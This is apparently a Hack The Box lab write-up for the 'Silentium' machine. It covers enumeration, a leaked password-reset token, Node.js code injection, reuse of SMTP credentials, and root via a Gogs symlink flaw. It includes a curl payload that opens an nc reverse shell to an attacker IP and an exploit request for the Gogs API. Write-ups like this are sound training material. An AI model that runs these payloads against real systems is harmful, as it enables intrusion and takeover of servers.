← Back to writeups
Hack The BoxHTB WriteupRCEPrivilege EscalationGogs

Hack The Box Silentium Writeup | Account Takeover, RCE, and Root

Hack The Box Silentium writeup covering enumeration, password reset token leak, authenticated RCE, credential reuse, and privilege escalation to root.

Hack The Box Silentium Writeup

Executive Summary

Silentium starts with standard enumeration and subdomain discovery, which exposes a staging application. A password reset information disclosure leads to account takeover, then an authenticated Node.js code execution issue provides shell access. Environment variable leakage enables lateral movement, and root is obtained by exploiting an unpatched Gogs vulnerability.

Target Information

  • Target IP: 10.129.20.2
  • Hostname: silentium.htb

1. Enumeration

Port Scan

nmap -sV -sC -Pn 10.129.20.2

Open ports identified:

  • 22/tcp SSH
  • 80/tcp HTTP (http://silentium.htb/)

Subdomain Discovery

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
  -u http://silentium.htb/ \
  -H "Host: FUZZ.silentium.htb"

This revealed staging.silentium.htb, which hosted the login portal.

2. Initial Access via Password Reset Leak

Version Check

curl -s http://staging.silentium.htb/api/v1/version

The API returned version 3.0.5, which mapped to known security issues including GHSA-3gcm-f6qx-ff7p.

Password Reset Token Disclosure

During a "Forgot Password" request, the response leaked sensitive user metadata, including tempToken.

{
  "user": {
    "id": "e26c9d6c-678c-4c10-9e36-01813e8fea73",
    "name": "admin",
    "email": "ben@silentium.htb",
    "credential": "$2a$05$6o1ngPjXiRj.EbTK33PhyuzNBn2CLo8.b0lyys3Uht9Bfuos2pWhG",
    "tempToken": "YF0s7nhckWxvIe7Un2c3JLjwN5yxEEngMXtUen91m4LSAKSFq2R8X8zKR0GGQ2Yy",
    "tokenExpiry": "2026-04-12T19:26:25.871Z",
    "status": "active"
  }
}

Using that token at http://staging.silentium.htb/reset-password, I reset ben@silentium.htb and obtained authenticated access.

3. Foothold (Authenticated RCE)

After login, I found /api/v1/node-load-method/customMCP. The mcpServerConfig input was evaluated as Node.js code, enabling command execution.

curl -X POST "http://staging.silentium.htb/api/v1/node-load-method/customMCP" \
  -H "Authorization: Bearer <ACCESS_TOKEN>" \
  -H "Content-Type: application/json" \
  -d '{
    "inputs": {
      "mcpServerConfig": "(global.process.mainModule.require(\"child_process\").exec(\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.15.38 4444 >/tmp/f\"))"
    },
    "loadMethod": "listActions"
  }'

Result: reverse shell as the web service user.

4. Lateral Movement

I inspected environment variables and recovered SMTP credentials.

env | grep SMTP
# SMTP_PASSWORD= [:sob:]

The password was reused for SSH access as ben.

ssh ben@10.129.20.2

5. Privilege Escalation to Root

Local service enumeration identified Gogs v0.13.3, vulnerable to CVE-2025-8110 (symlink path traversal leading to arbitrary write/RCE).

Using a valid Gogs API token, I abused the repository contents API to overwrite a sensitive file path and obtain root-level execution.

curl -X PUT "http://127.0.0.1:<GOGS_PORT>/api/v1/repos/<USER>/<REPO_NAME>/contents/<SYMLINK_NAME>" \
  -H "Authorization: token <GOGS_API_TOKEN>" \
  -H "Content-Type: application/json" \
  -d '{
    "message": "Exploit: overwrite target file",
    "content": "<BASE64_ENCODED_CONTENT>",
    "sha": "<CURRENT_FILE_SHA>",
    "branch": "master"
  }'

Result: root shell obtained and machine fully compromised.